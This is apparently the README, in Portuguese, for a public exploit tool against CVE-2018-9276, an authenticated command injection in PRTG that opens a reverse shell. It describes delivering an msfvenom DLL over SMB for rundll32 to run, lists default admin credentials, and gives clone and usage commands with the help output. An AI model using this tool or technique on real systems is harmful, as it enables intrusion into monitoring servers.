
CVE-2018-9276 PRTG < 18.2.39 Injeção de Comandos Autenticada (Shell Reversa)
https://nvd.nist.gov/vuln/detail/CVE-2018-9276
Versão melhorada de um exploit escrito por https://github.com/M4LV0. Usei os dados POST do script deles, mas apenas o tornei mais confiável, pois não tive muito sucesso com ele.
A entrega do payload é essencialmente smb_delivery. O Impacket serve um .dll gerado pelo msfvenom, e o rundll32.exe faz todo o trabalho.
Testado no Windows Server 2016 contra PRTG 18.1.37.
Este código não é, de forma alguma, bem escrito e foi montado a partir do stackoverflow. Foi desenvolvido para uso com Kali Linux e pressupõe que o seguinte esteja disponível:
Este é um exploit de apontar e disparar; tudo o que você precisa saber são as credenciais de administrador da instância PRTG (padrão prtgadmin:prtgadmin). Dependendo da configuração da máquina alvo, sua milhagem pode variar. As seguintes premissas foram adotadas:
git clone https://github.com/wildkindcc/CVE-2018-9276.git
python CVE-2018-9276.py -h
Descubra as credenciais e solte shells :)
usage: CVE-2018-9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
[--user USER] [--password PASSWORD] [--https]
optional arguments:
-h, --help show this help message and exit
-i HOST, --host HOST IP address / Hostname of vulnerable PRTG server
-p PORT, --port PORT Port number
--lhost LHOST LHOST for MSFVENOM
--lport LPORT LPORT for MSFVENOM
--user USER Administrator Username
--password PASSWORD Administrator Password
--https Negotiate SSL connection to the server (Requires
socket to be compiled with SSL support)
Isso não vai deixar você hackear a Gibson. Não use isto contra QUALQUER sistema para o qual você não esteja autorizado. Eu escrevi isso por diversão. Apenas para fins educacionais, etc etc.